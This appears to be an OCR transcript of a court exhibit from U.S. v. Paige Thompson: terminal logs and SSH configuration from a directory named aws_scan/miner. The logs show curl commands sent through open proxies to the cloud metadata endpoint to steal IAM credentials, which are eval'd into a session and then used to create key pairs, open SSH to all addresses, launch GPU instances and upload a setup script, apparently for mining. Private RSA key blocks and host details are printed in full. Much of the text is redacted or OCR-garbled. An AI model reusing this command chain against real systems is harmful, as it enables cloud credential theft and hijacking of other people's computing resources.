--instance-initiated-shutdown-behavior terminate --key-name default

aws ec2 describe-instances --region us-west-2 |                      | .[] | .Instances | .[] |
.PublicIpAddress'
54.245.138.241
34.219.67.228
54.218.184.212
34.217.80.183
54.191.222.165
54.71.189.62


host
  HostName         54.245.138.241
  User             ubuntu
  IdentityFile
  IdentitiesOnly   yes

host
  HostName         34.219.67.228
  User             ubuntu
  IdentityFile
  IdentitiesOnly   yes

host
  HostName         54.218.184.212
  User             ubuntu
```

```
   IdentityFile          ██████████████████
   IdentitiesOnly        yes

host ████████████
   HostName              34.217.80.183
   User                  ubuntu
   IdentityFile          ██████████████████
   IdentitiesOnly        yes

host ███████████
   HostName              54.191.222.165
   User                  ubuntu
   IdentityFile          ██████████████████
   IdentitiesOnly        yes

host ███████████
   HostName              54.71.189.62
   User                  ubuntu
   IdentityFile          ██████████████████
   IdentitiesOnly        yes
```

```
  ┌ ▯ 25.06.19 ▯ ▯ 18:26:32 ▯ erratic@molly ▯ ▯  1.01 ▯ ▯ 71.49G ▯
├─ ▯ ~/aws_scan/miner ▯
                       ▯ 10040 ▯ 1 ↵
└ scp setup.sh ███████████████:/home/ubuntu
setup.sh
    100%  19KB  20.5KB/s   00:00
  ┌ ▯ 25.06.19 ▯ ▯ 18:26:47 ▯ erratic@molly ▯ ▯  1.01 ▯ ▯ 71.49G ▯
├─ ▯ ~/aws_scan/miner ▯
                       ▯ 10041 ▯ ▯
└ scp setup.sh ███████████████:/home/ubuntu
The authenticity of host '34.219.67.228 (<no hostip for proxy command>)' can't be established.
ECDSA key fingerprint is SHA256:RYa0Yu5KcUQFpkNPsXcAQdO+rG2G3VeiJiSMY0SbetE.
No matching host key fingerprint found in DNS.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '34.219.67.228' (ECDSA) to the list of known hosts.
setup.sh
    100%  19KB  24.4KB/s   00:00
```

```
┌ ⬚ 25.06.19 ⬚ ⬚ 18:27:05 ⬚ erratic@molly ⬚ ⬚ 1.00 ⬚ ⬚ 71.49G ⬚
├ ⬚ ~/aws_scan/miner ⬚
                          ⬚ 10042 ⬚ ⬚
└ scp setup.sh [          ]:/home/ubuntu
The authenticity of host '54.218.184.212 (<no hostip for proxy command>)' can't be established.
ECDSA key fingerprint is SHA256:+apzPLm1bSKcbA2vQ/ziRCCxOZq2fEzut91hAuE2vOk.
No matching host key fingerprint found in DNS.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '54.218.184.212' (ECDSA) to the list of known hosts.
setup.sh
    100%   19KB  20.9KB/s   00:00
┌ ⬚ 25.06.19 ⬚ ⬚ 18:27:19 ⬚ erratic@molly ⬚ ⬚ 1.02 ⬚ ⬚ 71.49G ⬚
├ ⬚ ~/aws_scan/miner ⬚
                          ⬚ 10043 ⬚ ⬚
└ scp setup.sh [          ]:/home/ubuntu
The authenticity of host '34.217.80.183 (<no hostip for proxy command>)' can't be established.
ECDSA key fingerprint is SHA256:HHNCOmuoyO2nZLoMaShKUCXspvGKyD/uu2poM+33I+0.
No matching host key fingerprint found in DNS.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '34.217.80.183' (ECDSA) to the list of known hosts.
setup.sh
    100%   19KB  25.5KB/s   00:00
┌ ⬚ 25.06.19 ⬚ ⬚ 18:27:33 ⬚ erratic@molly ⬚ ⬚ 1.12 ⬚ ⬚ 71.49G ⬚
├ ⬚ ~/aws_scan/miner ⬚
                          ⬚ 10044 ⬚ ⬚
└ scp setup.sh [          ]:/home/ubuntu
The authenticity of host '54.191.222.165 (<no hostip for proxy command>)' can't be established.
ECDSA key fingerprint is SHA256:8jQTulKraup63Tb3lF6ltMFSeHcYV5NU3CPE2+Zrvxg.
No matching host key fingerprint found in DNS.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '54.191.222.165' (ECDSA) to the list of known hosts.
setup.sh
    100%   19KB  26.9KB/s   00:00
┌ ⬚ 25.06.19 ⬚ ⬚ 18:27:48 ⬚ erratic@molly ⬚ ⬚ 1.21 ⬚ ⬚ 71.48G ⬚
├ ⬚ ~/aws_scan/miner ⬚
                          ⬚ 10045 ⬚ ⬚
└ scp setup.sh [          ]:/home/ubuntu
The authenticity of host '54.71.189.62 (<no hostip for proxy command>)' can't be established.
ECDSA key fingerprint is SHA256:s1A6R1NYqpzPCdSLXR/VeZj7QJsGczs/TV7UlxuhCxw.
```

```
No matching host key fingerprint found in DNS.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '54.71.189.62' (ECDSA) to the list of known hosts.
setup.sh
    100%   19KB  23.3KB/s   00:00
┌─ ▨ 25.06.19 ▨ ▨  18:28:02 ▨ erratic@molly ▨ ▨  1.20 ▨ ▨ 71.48G ▨
├─ ▨ ~/aws_scan/miner ▨
│                           ▨ 10046 ▨ ▨
└─
```

bootstrapped

--------------------

```
eval `curl -vvv --connect-timeout 10 -m 20 --fail -L -k -s --proxy-insecure --proxy
http://54.91.66.210:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/▨▨▨▨▨▨▨▨▨▨▨▨▨▨▨ |
▨▨▨▨▨▨▨▨▨▨▨ | awssession.sh`

 aws ec2 create-key-pair --key-name default --region us-east-2
{
    "KeyFingerprint": "3a:89:03:7e:fe:50:c0:4c:1f:c3:62:6b:f0:e2:2e:c4:0e:0e:b2:c5",
    "KeyMaterial": "-----BEGIN RSA PRIVATE
```

KEY-----\nMIIEoAIBAAKCAQEAotUjec8Ywi9gPSZuxRIP0api2uOQ72El9+Q16RsKEKWKK89O+pSi49j7koGI\nGQQgib3x9E3VQJF144Kg
kDBN8zxM+1VNyI6HrcKQN2GYir6PrMlw652cFdSctzUIf8WNr4pliYL4o\n8ReDqkdh9cQ9ZUMpDzScmrzh1IpgB/V6thUC4i0FcDWlIKrq
1H+kcV+I5uHQCVcem0LUrDxewFGT\nJCiHYCv1cYCD6z1vZ5wfDW+MFRbmar0T23LaHWiaPL8982/YJJkSRwGCwm8z9eU5DPspUQkWaNpe\
nncuhF/okM/yzCa7sxUD+jPkbBWqR27x4SDIBLTsS5i3z16SBgeblcwIDAQABAoIBAEuiJrVInZ5s\n9Q3SUTdWeWSQ+RPlCgg2nrUzGltp
RNaQncpVo8C+055zxf66DeZaoewY7dvg7NXHWQM49m1pi9p/\nfPsHpIeqiTqr6QZwAoKE6BVfQ7kCYEWXai3iHgY4gP8i8dAv48KAgpbQS
08l1MK5XFQEww0Y2Oip\nuUYvA2TvDbh7leHKD/k1X3hAEq6cHfTzfyCz/pRxKOBEsOC8uLz0JqhFfGshushrupU5x58XlxqlL\nQHgmnPGi
Wp1gfiM48gKcw80jzmc4ifTKb5+Re5SOm+TameP573tnlLjOPv0xXcyjG6WbnVaW2j8e\nymGgke3pKUBJ9KwbQPdz3UodlXECgYEA4Qdcf
6jkpfvKHhmF4cJn1B2yY04OQQ4fuDEwFbt4wB4p\nF0OUe8FxyRYufI9TJYmPB5NOpmqmL+11Vvaw8+65hKMUB0VQ6eXrVnKeikyLg8PEVy
jHhmrrSSSG\niQ2NjnkimJUohFGDO21MJ09+dF0H+wF7iFvs/h1cioe4zyTgyGsCgYEAuT5dHPw8KK9o7J73EngK\n5z/fD6V2gy5dh898y
7X8a0mr65MIWWPRyd0RCD8vOw/k4s3w+MiVqnsYJM4R2Q0mLvPhA4qf5mvx\nrGfdEm3+aTyUx2FpqYCL7fZHm3sy2pwyEaiZRuqk2mRFob
Uwu/bJpuRPW+9TcEGfxpJ9xGTauRkC\nfz9J0roUxjnolu/gPcdA5fLCZ2mGinvBfSpQqzVxhISD9wqT9y7XOSlVE730kW39QjzfMT+cvyC
7\nqETNHPd+LK8hLoDc/eTKxWWK1wwOey6T4KSi03r6lzH7E9t39FgduZ0wVjTguAf+tWxY7zfK8nOl\n9xhiwkS1/VD42wFnXdECgYBTtV

HAWl8ZB4MDgiYmC2bp7tvupxex2c7cIy/Coj8pgEYXEv8v3cKc\nVLBwqJTAPMNylhtxYLr5KdzULOa1zZJWn1AsGIV/S4IPJXQp8tiHV5/
npSZpOTSCWMstAHQPg4vA\nnQ5+lGPgaHVqyIT4O2IOb5dI9RIgZRc9VU9N40FPaQKBgBRWL+7HJb9onAJX5TN5W2E+9HysLEIn\nNNyEaI
gycvlyv6ITvn+0FhYQBahUwEPQyv0ilr2bnQtnycrBfInUDNzkoqWLEQky5v3R1r2eE3GZ\nE5t3JgrQhKMrW0cCmutx+9S0ETBGCmpEgZm
QqRhhBhyWPR95djzgr9v8m3q3SBKB\n-----END RSA PRIVATE KEY-----",
    "KeyName": "default"
}

echo -e "-----BEGIN RSA PRIVATE
KEY-----\nMIIEoAIBAAKCAQEAotUjec8Ywi9gPSZuxRIP0api2uOQ72El9+Q16RsKEKWKK89O+pSi49j7koGI\nGQgib3x9E3VQJF144Kg
kDBN8zxM+1VNyI6HrcKQN2GYir6PrMlw652cFdSctzUIf8WNr4pliYL4o\n8ReDqkdh9cQ9ZUMpDzScmrzh1IpgB/V6thUC4i0FcDWlIKrq
1H+kcV+I5uHQCVcem0LUrDxewFGT\nJCiHYCv1cYCD6z1vZ5wfDW+MFRbmar0T23LaHWiaPL8982/YJJkSRwGCwm8z9eU5DPspUQkWaNpe\
nncuhF/okM/yzCa7sxUD+jPkbBWqR27x4SDIBLTsS5i3z16SBgeblcwIDAQABAoIBAEuiJrVInZ5s\n9Q3SUTdWeWSQ+RPlCgg2nrUzGltp
RNaQncpVo8C+055zxf66DeZaoewY7dvg7NXHWQM49m1pi9p/\nfPSHpIeqiTqr6QZwAoKE6BVfQ7kCYEWXai3iHgY4gP8i8dAv48KAgpbQS
08l1MK5XFQEww0Y2Oip\nUYvA2TvDbh7leHKD/k1X3hAEq6cHfTzfyCz/pRxKOBEsOC8uLz0JqhFfGshushrupU5x58XlxqlL\nQHgmnPGi
Wp1gfiM48gKcw80jzmc4ifTKb5+Re5SOm+TameP573tn1LjOPv0xXcyjG6WbnVaW2j8e\nnymGgke3pKUBJ9KwbQPdz3UodlXECgYEA4Qdcf
6jkpfvKHhmF4cJn1B2yY04OQQ4fuDEwFbt4wB4p\nF0OUe8FxyRYufI9TJYmPB5NOpmqmL+11Vvaw8+65hKMUB0VQ6eXrVnKeikyLg8PEVy
jHhmrrSSSG\niQ2NjnkimJUohFGDO21MJ09+dF0H+wF7iFvs/h1cioe4zyTgyGsCgYEAuT5dHPw8KK9o7J73EngK\n5z/fD6V2gy5dh898y
7X8a0mr65MIWWPRyd0RCD8vOw/k4s3w+MiVqnsYJM4R2Q0mLvPhA4qf5mvx\nrGfdEm3+aTyUx2FpqYCL7fZHm3sy2pwyEaiZRuqk2mRFob
Uwu/bJpuRPW+9TcEGfxpJ9xGTauRkC\nnfz9J0roUxjnolu/gPcdA5fLCZ2mGinvBfSpQqzVxhISD9wqT9y7XOSlVE730kW39QjzfMT+cvyC
7\nqETNHPd+LK8hLoDc/eTKxWWK1wwOey6T4KSi03r6lzH7E9t39FgduZ0wVjTguAf+tWxY7zfK8nOl\nn9xhiwkS1/VD42wFnXdECgYBTtV
HAWl8ZB4MDgiYmC2bp7tvupxex2c7cIy/Coj8pgEYXEv8v3cKc\nVLBwqJTAPMNylhtxYLr5KdzULOa1zZJWn1AsGIV/S4IPJXQp8tiHV5/
npSZpOTSCWMstAHQPg4vA\nnQ5+lGPgaHVqyIT4O2IOb5dI9RIgZRc9VU9N40FPaQKBgBRWL+7HJb9onAJX5TN5W2E+9HysLEIn\nNNyEaI
gycvlyv6ITvn+0FhYQBahUwEPQyv0ilr2bnQtnycrBfInUDNzkoqWLEQky5v3R1r2eE3GZ\nE5t3JgrQhKMrW0cCmutx+9S0ETBGCmpEgZm
QqRhhBhyWPR95djzgr9v8m3q3SBKB\n-----END RSA PRIVATE KEY-----" > ~/.ssh/
┌─ ▢ 25.06.19 ▢ ▢ 18:52:37 ▢ erratic@molly ▢ ▢ 0.99 ▢ ▢ 71.38G ▢
├─ ▢ ~/aws_scan/miner ▢
                        ▢ 10147 ▢ ▢
└─ chmod 0600 ~/.ssh/

aws ec2 --region us-east-2 create-security-group --group-name reserved --▢▢▢▢▢▢▢▢6522 --description
"No description specified"

{
    "GroupId": ▢▢▢▢▢▢▢7de6"
}

aws ec2 authorize-security-group-ingress --group-id ▢▢▢▢▢▢▢7de6 --protocol tcp --port 22 --cidr

```
0.0.0.0/0 --region us-east-2

aws ec2 run-instances --region us-east-2 --instance-type p3.8xlarge --count 1 --image-id
ami-[        ]d806 --associate-public-ip-address --security-group-ids sg-[        ]7de6
--instance-initiated-shutdown-behavior terminate --key-name default

aws ec2 run-instances --region us-east-2 --instance-type p3.2xlarge --count 1 --image-id
ami-[        ]d806 --associate-public-ip-address --security-group-ids sg-[        ]7de6
--instance-initiated-shutdown-behavior terminate --key-name default

aws ec2 describe-instances --region us-east-2 | [            ] | .[] | [        ] | .[] |
.PublicIpAddress'

18.217.93.189
52.14.129.153


host [              ]
  HostName            18.217.93.189
  User                ubuntu
  IdentityFile        [                    ]
  IdentitiesOnly      yes

host [              ]
  HostName            52.14.129.153
  User                ubuntu
  IdentityFile        [                    ]
  IdentitiesOnly      yes


  ⌐ ▯ 25.06.19 ▯ ▯ 19:02:40 ▯ erratic@molly ▯ ▯ 1.38 ▯ ▯ 71.26G ▯
├ ▯ ~/aws_scan/miner ▯
                        ▯ 10072 ▯ ▯
└ scp setup.sh [              ]:/home/ubuntu
The authenticity of host '18.217.93.189 (<no hostip for proxy command>)' can't be established.
ECDSA key fingerprint is SHA256:H5kwXSDITskM3icWNdza+NrNacVFupqNO2YNU4X82R8.
No matching host key fingerprint found in DNS.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '18.217.93.189' (ECDSA) to the list of known hosts.
```

```
setup.sh
     100%   19KB  22.1KB/s   00:00
┌ ▯ 25.06.19 ▯ ▯  19:03:42 ▯ erratic@molly ▯ ▯  1.30 ▯ ▯ 71.24G ▯ ▯
├ ▯ ~/aws_scan/miner ▯
│                        ▯ 10073 ▯ ▯
└ scp setup.sh �způ░░░░░░░░░░░░░:/home/ubuntu
The authenticity of host '52.14.129.153 (<no hostip for proxy command>)' can't be established.
ECDSA key fingerprint is SHA256:5lT9S4IOzDkeWlU/QezpIxZs96iE4eTQzQ9vZmE+9oY.
No matching host key fingerprint found in DNS.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '52.14.129.153' (ECDSA) to the list of known hosts.
setup.sh
     100%   19KB  30.9KB/s   00:00
┌ ▯ 25.06.19 ▯ ▯  19:03:54 ▯ erratic@molly ▯ ▯  1.29 ▯ ▯ 71.23G ▯ ▯
├ ▯ ~/aws_scan/miner ▯
│                        ▯ 10074 ▯ ▯
└


bootstrapped


-------------

eval `curl -vvv --connect-timeout 10 -m 20 --fail -L -k -s --proxy-insecure --proxy
http://18.210.69.172:3128 http://169.254.169.254/latest/meta-data/iam/security-credentials/░░░░░░░░░ | ░░
             awssession.sh`

aws ec2 describe-vpcs --region eu-west-2
{
    "Vpcs": [
        {
            "CidrBlock": "172.31.0.0/16",
            "DhcpOptionsId": ░░░░░░░░░░14e4",
            "State": "available",
            "VpcId": ░░░░░░░░░a325",
            "OwnerId": ░░░░░░░9793",
            "InstanceTenancy": "default",
            "CidrBlockAssociationSet": [
```

```
            {
                "AssociationId": ▭▭▭7477",
                "CidrBlock": "172.31.0.0/16",
                "CidrBlockState": {
                    "State": "associated"
                }
            }
        ],
        "IsDefault": true
    }
  ]
}

aws ec2 --region eu-west-2 create-security-group --group-name reserved --▭▭▭a325 --description
"No description specified"
{
    "GroupId": ▭▭▭18c3"
}

aws ec2 authorize-security-group-ingress --group-id ▭▭▭18c3 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region eu-west-2


18.130.57.216
35.177.14.176

├─ ▭ ~/aws_scan/miner ▭
                        ▭ 10098 ▭ ▭
└─ scp setup.sh ▭▭▭:/home/ubuntu
The authenticity of host '18.130.57.216 (<no hostip for proxy command>)' can't be established.
ECDSA key fingerprint is SHA256:Y6LrQnt5gWRBgApadyK1shATPyH5JNWap8b83gRVmq4.
No matching host key fingerprint found in DNS.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '18.130.57.216' (ECDSA) to the list of known hosts.
setup.sh
     100%   19KB  25.5KB/s   00:00
┌─ ▭ 25.06.19 ▭ ▭ 19:27:47 ▭ erratic@molly ▭ ▭  1.40 ▭ ▭ 71.19G ▭
├─ ▭ ~/aws_scan/miner ▭
                        ▭ 10099 ▭ ▭
```

```
└ scp setup.sh ▮▮▮▮▮▮▮▮:/home/ubuntu
The authenticity of host '35.177.14.176 (<no hostip for proxy command>)' can't be established.
ECDSA key fingerprint is SHA256:k40Ykzxf9njBxOGZ6cUTCMtVjVL2+w+gyrhnYKQURE0.
No matching host key fingerprint found in DNS.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '35.177.14.176' (ECDSA) to the list of known hosts.
setup.sh
    100%   19KB  32.9KB/s   00:00
┌ ▮ 25.06.19 ▮ ▮  19:27:59 ▮ erratic@molly ▮ ▮  1.47 ▮ ▮ 71.18G ▮
├ ▮ ~/aws_scan/miner ▮
│                         ▮ 10100 ▮ ▮
└


bootstrapped


---------


eval `curl -vvv --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy http://13.235.73.204:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/▮▮▮▮▮▮▮▮ | ▮▮▮▮▮▮▮▮▮▮▮ |
awssession.sh`

aws ec2 create-key-pair --region us-east-1 --key-name default
{
    "KeyFingerprint": "83:d8:34:7a:32:35:7f:ae:64:a1:ba:ad:1c:4b:d5:9c:de:a7:53:f3",
    "KeyMaterial": "-----BEGIN RSA PRIVATE
```

```
KEY-----\nMIIEogIBAAKCAQEA1xe/q+gD3BnALtYSQ5X4iRM7cqqSPULNM0o5JUsuxjQH6O1fBOXgkmVntOm+\nJh4nj0nwkQIQePChPsj
cKp7g4SUQT0iIEpZTn/q+qYtEomfEmWY9ewG+KeBMCZHhupOo93INuTHS\nl03ut9D67UPd6nlhFHpQjZvi58VeBfhyXzvu2z4MincVMBJy
rs0dUp96ICuNlhulHGRmDzJHacvc\nX8Ucg6rtbOT9AVn6Y9kGFayArRVqoF8B7oGSA6RYdp7ZNUSLJmtwvOeJ1wc1LJEzd7KqF6XJyXn2\
nyvxDViXaTjP7HEMyMV2xA0gcwTFKSgDI8mODy0SnJv8avEucKR1ZtwIDAQABAoIBAFtpEGAyflFv\n8Cj3eVOXzMQUlFMrAnNejG6bwKWE
yiAZxLLNDnC6cTJGPki4fcMdVZqjxcUap31+ZkiUfFzwoImO\ngtvu60Va9bcrjRPoyAZtKzQ2KzK3juWlGSuH//KXBlwC8Kof7mu3Bxi/i
6SCDzGy2/sj8E/+S/RM\nAKVw7Mpjmqkq9z7O11x9BxwHGGqPk7up2jYNBbe6LdTaONqxZqImRMgXCOPV28Z0tgVp8Uf4jvEf\nmsDE3uQ/
78FFRrJqyL0p7kDozsEdPxNjCDexEXueOdDnmDBa/qw2sLaYM1rKBFZw+xmQZTntN9oz\ndt8tMDJHFzVU2kldKH6Tacgd5AECgYEA7lpik
p2XMRAmWI9kmlK9oIrlD94nb7eb0QD2Zx3jnvf5\nYjrqhO8f3nLwqUjU9fo7xnXnvau4WtHwbbdaG3/jYx2q5n0qT0U5IPLbTqS+jQuHCe
AAd/yXGsig\nS+22k74z2fbRfOqGTRJDdMTof+s4M0an39HirQA+5GKNEMdDSjcCgYEA5wSAJXVBoZ8g0+1Zi0Gx\naIkN9wJ8NQ5PuAdbs
xpc7BVupYbQWwI2NuRwVa6FO6gzFMp5tVW3T4/gCoOc7LT7QfV0/juzebAL\nDsXImY4GQifvkv1b7M4kyhMmDy7/hs0z8MIgsu/lHXoYYg
/11kt7H/0QvVaxlBsjUNMJELxorIEC\nngYBHbPBzDSR8gGFtUnMMR9UpYdXonmLk+HmJ9SbhmbRXM+oYhJ04fsvnBjyWDgw7NeRpwxVTgjz
```

5\ngkXxKuump/lE/2PyM/nUzWKkPAJ6G6Y6cATkcarSSfAiB5L5jd+TgIDbRTpbm4/pUprCSCuAAcXS\nn864pJWv0A4ItHufVocUmwKBgG
F6B6xGhrPwlgR2QPM+e+IU+nyAYvJsIH0RNcMj25OOE4rqkJ3m\nGAQfbbrpkbQza6JZMPOvwFJk7e7hy+QhFWemb4Aapscw3emU0OjiAYg
Gm9MU7qXD8cgGPmfnt9Ak\nY8cx0mROTwmaDBHMlDmgzcoYmOibXQCWVtdyxH94UF6BAoGAUjqW9npytyxOEJtHaU++PpTgxHzP\ndX6VGT
nlOtzQX/wA+UIVgSrydSRqe9m2Ue8CcswfHG3NJv5ewsHXV+0jirQvbqiWnj7SYRhWegf5\nw8DRaq6mZRj54g6Raba/NGo9Wv59eUXMF7J
/1TBzqgrkvYcDPAWAa2q3ZvmhCYfX1j0=\n-----END RSA PRIVATE KEY-----",
        "KeyName": "default"
}

echo -e "-----BEGIN RSA PRIVATE
KEY-----\nMIIEogIBAAKCAQEA1xe/q+gD3BnALtYSQ5X4iRM7cqqSPULNM0o5JUsuxjQH6O1fBOXgkmVntOm+\nJh4nj0nwkQIQePChPsj
cKp7g4SUQT0iIEpZTn/q+qYtEomfEmWY9ewG+KeBMCZHhupOo93INuTHS\nl03ut9D67UPd6nlHFHpQjZvi58VeBfhyXzvu2z4MincVMBJy
rs0dUp96ICuNlhulHGRmDzJHacvc\nX8Ucg6rtbOT9AVn6Y9kGFayArRVqoF8B7oGSA6RYdp7ZNUSLJmtwvOeJ1wc1LJEzd7KqF6XJyXn2\
nyvxDViXaTjP7HEMyMV2xA0gcwTFKSgDI8mODy0SnJv8avEucKR1ZtwIDAQABAoIBAFtpEGAyflFv\n8Cj3eVOXzMQUlFMrAnNejG6bwKWE
yiAzxLLNDnC6cTJGPki4fcMdVZqjxcUap31+ZkiUfFzwoImO\ngtvu60Va9bcrjRPoyAZtKzQ2KzK3juWlGSuH//KXBlwC8Kof7mu3Bxi/i
6SCDzGy2/sj8E/+S/RM\nAKVw7Mpjmqkq9z7O11x9BxwHGGqPk7up2jYNBbe6LdTaONqxZqImRMgXCOPV28Z0tgVp8Uf4jvEf\nmsDE3uQ/
78FFRrJqyL0p7kDozsEdPxNjCDexEXueOdDnmDBa/qw2sLaYM1rKBFZw+xmQZTntN9oz\ndt8tMDJHFzVU2kldKH6Tacgd5AECgYEA7lpik
p2XMRAmWI9kmlK9oIrlD94nb7eb0QD2Zx3jnvf5\nYjrqhO8f3nLwqUjU9fo7xnXnvau4WtHwbbdaG3/jYx2q5n0qT0U5IPLbTqS+jQuHCe
AAd/yXGsig\nS+22k74z2fbRfOqGTRJDdMTof+s4M0an39HirQA+5GKNEMdDSjcCgYEA5wSAJXVBoZ8g0+1Zi0Gx\naIkN9wJ8NQ5PuAdbs
xpc7BVupYbQWwI2NuRwVa6FO6gzFMp5tVW3T4/gCoOc7LT7QfV0/juzebAL\nDsXImY4GQifvkv1b7M4kyhMmDy7/hs0z8MIgsu/lHXoYYg
/11kt7H/0QvVaxlBsjUNMJELxorIEC\ngYBHbPBzDSR8gGFtUnMMR9UpYdXonmLk+HmJ9SbhmbRXM+oYhJ04fsvnBjyWDgw7NeRpwXVTgjz
5\ngkXxKuump/lE/2PyM/nUzWKkPAJ6G6Y6cATkcarSSfAiB5L5jd+TgIDbRTpbm4/pUprCSCuAAcXS\nn864pJWv0A4ItHufVocUmwKBgG
F6B6xGhrPwlgR2QPM+e+IU+nyAYvJsIH0RNcMj25OOE4rqkJ3m\nGAQfbbrpkbQza6JZMPOvwFJk7e7hy+QhFWemb4Aapscw3emU0OjiAYg
Gm9MU7qXD8cgGPmfnt9Ak\nY8cx0mROTwmaDBHMlDmgzcoYmOibXQCWVtdyxH94UF6BAoGAUjqW9npytyxOEJtHaU++PpTgxHzP\ndX6VGT
nlOtzQX/wA+UIVgSrydSRqe9m2Ue8CcswfHG3NJv5ewsHXV+0jirQvbqiWnj7SYRhWegf5\nw8DRaq6mZRj54g6Raba/NGo9Wv59eUXMF7J
/1TBzqgrkvYcDPAWAa2q3ZvmhCYfX1j0=\n-----END RSA PRIVATE KEY-----" > ~/.ssh/


aws ec2 describe-vpcs --region us-east-1
{
    "Vpcs": [
        {
            "CidrBlock": "172.31.0.0/16",
            "DhcpOptionsId": "                7743",
            "State": "available",
            "VpcId": "          1984",
            "OwnerId": "          7067",
            "InstanceTenancy": "default",
            "CidrBlockAssociationSet": [
                {

```
                "AssociationId": [          ]240d",
                "CidrBlock": "172.31.0.0/16",
                "CidrBlockState": {
                    "State": "associated"
                }
            }
        ],
        "IsDefault": true
    }
    ]
}

aws ec2 --region us-east-1 create-security-group --group-name reserved --[          ]1984 --description
"No description specified"
{
    "GroupId": "sg-[          ]2f9f"
}
```

```
┌ ▯ 25.06.19 ▯ ▯ 19:40:17 ▯ erratic@molly ▯ ▯ 3.47 ▯ ▯ 71.03G ▯
├ ▯ ~/aws_scan/miner ▯
             ▯ 10202 ▯ SIG(127) ↵
└ aws ec2 run-instances --region us-east-1 --instance-type p3.8xlarge --count 2 --image-id ami-
--security-group-ids sg-[          ]2f9f --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default

An error occurred (InstanceLimitExceeded) when calling the RunInstances operation: You have requested more
instances (2) than your current instance limit of 0 allows for the specified instance type. Please visit
http://aws.amazon.com/contact-us/ec2-request to request an adjustment to this limit.
┌ ▯ 25.06.19 ▯ ▯ 19:40:39 ▯ erratic@molly ▯ ▯ 3.39 ▯ ▯ 71.03G ▯
├ ▯ ~/aws_scan/miner ▯
             ▯ 10203 ▯ SIG(127) ↵
└ aws ec2 run-instances --region us-east-1 --instance-type p3.2xlarge --count 2 --image-id ami-
--security-group-ids sg-[          ]2f9f --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default

An error occurred (InstanceLimitExceeded) when calling the RunInstances operation: You have requested more
instances (2) than your current instance limit of 0 allows for the specified instance type. Please visit
http://aws.amazon.com/contact-us/ec2-request to request an adjustment to this limit.
┌ ▯ 25.06.19 ▯ ▯ 19:40:49 ▯ erratic@molly ▯ ▯ 3.33 ▯ ▯ 71.02G ▯
```

```
├─ ▯ ~/aws_scan/miner ▯
                ▯ 10204 ▯ SIG(127) ↵
└─
```

```
host *
  ForwardAgent            no
  ForwardX11              no
  VerifyHostKeyDNS        yes
  TCPKeepAlive            yes
  ServerAliveInterval     1
  ServerAliveCountMax     99
  Ciphers                 aes256-ctr,aes256-cbc
  MACs                    hmac-sha2-512,hmac-sha2-256,hmac-md5,hmac-sha1
  KexAlgorithms
diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-gro
up1-sha1
  IdentitiesOnly          yes
  ConnectTimeout          5
  ConnectionAttempts      5
  Compression             yes
  Protocol                2

host * !molly !ipmi !10.242.*, !*.seattle1.wa.us.yourstruly.sx, !192.168.*
!10.242.* !laptop !94.140.198.69 !50.244.113.177 !admin2-1 !3.8.142.149
  ProxyCommand            socat -d - socks:127.0.0.1:%h:%p,socksport=65534

host laptop
  User                    erratic
  Hostname                192.168.1.149
  IdentityFile            ~/.ssh/laptop.id_rsa
  IdentitiesOnly          yes

host github.com
  User                    git
  Hostname                github.com
  PreferredAuthentications publickey
  IdentitiesOnly          yes
  IdentityFile            ~/.ssh/github
  LogLevel                Debug
  BatchMode               yes

host comcastgw
  HostName                23.24.96.114
  User                    root
  IdentityFile            ~/.ssh/comcastgw.id_rsa
  IdentitiesOnly          yes

host shell
  HostName                13.53.137.56
  User                    ubuntu
  IdentityFile            ~/.ssh/shell
  IdentitiesOnly          yes

host molly
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 804
Admitted_____

```
HostName              192.168.1.248
ForwardX11            yes
ForwardAgent          yes
ForwardX11            yes
IdentitiesOnly        no

host ipmi
  User                ADMIN
  HostName            192.168.1.247
  ForwardAgent        no
  ForwardX11          no
  IdentitiesOnly      no

host subz
  user                erratic
  hostname            207.246.67.250
  Port                2222
  ForwardAgent        no
  ForwardX11          no
  IdentitiesOnly      no

host ▮▮▮▮▮▮▮▮
  HostName            18.130.57.216
  User                ubuntu
  IdentityFile        ~/.ssh/▮▮▮▮▮▮▮▮▮▮
  IdentitiesOnly      yes

host ▮▮▮▮▮▮
  HostName            35.177.14.176
  User                ubuntu
  IdentityFile        ~/.ssh/▮▮▮▮▮▮▮▮
  IdentitiesOnly      yes

host ▮▮▮▮▮▮▮▮▮▮
  HostName            18.217.93.189
  User                ubuntu
  IdentityFile        ~/.ssh/▮▮▮▮▮▮▮▮▮▮▮▮
  IdentitiesOnly      yes

host ▮▮▮▮▮▮▮▮▮▮
  HostName            52.14.129.153
  User                ubuntu
  IdentityFile        ~/.ssh/▮▮▮▮▮▮▮▮▮▮▮▮
  IdentitiesOnly      yes

host ▮▮▮▮▮▮▮▮
  HostName            54.245.138.241
  User                ubuntu
  IdentityFile        ~/.ssh/▮▮▮▮▮▮▮▮▮▮
  IdentitiesOnly      yes
```

```
host
  HostName                34.219.67.228
  User                    ubuntu
  IdentityFile            ~/.ssh/
  IdentitiesOnly          yes

host
  HostName                54.218.184.212
  User                    ubuntu
  IdentityFile            ~/.ssh/
  IdentitiesOnly          yes

host
  HostName                34.217.80.183
  User                    ubuntu
  IdentityFile            ~/.ssh/
  IdentitiesOnly          yes

host
  HostName                54.191.222.165
  User                    ubuntu
  IdentityFile            ~/.ssh/
  IdentitiesOnly          yes

host
  HostName                54.71.189.62
  User                    ubuntu
  IdentityFile            ~/.ssh/
  IdentitiesOnly          yes

host
  HostName                35.178.179.237
  User                    ubuntu
  IdentityFile            ~/.ssh/
  IdentitiesOnly          yes

host
  HostName                35.178.115.79
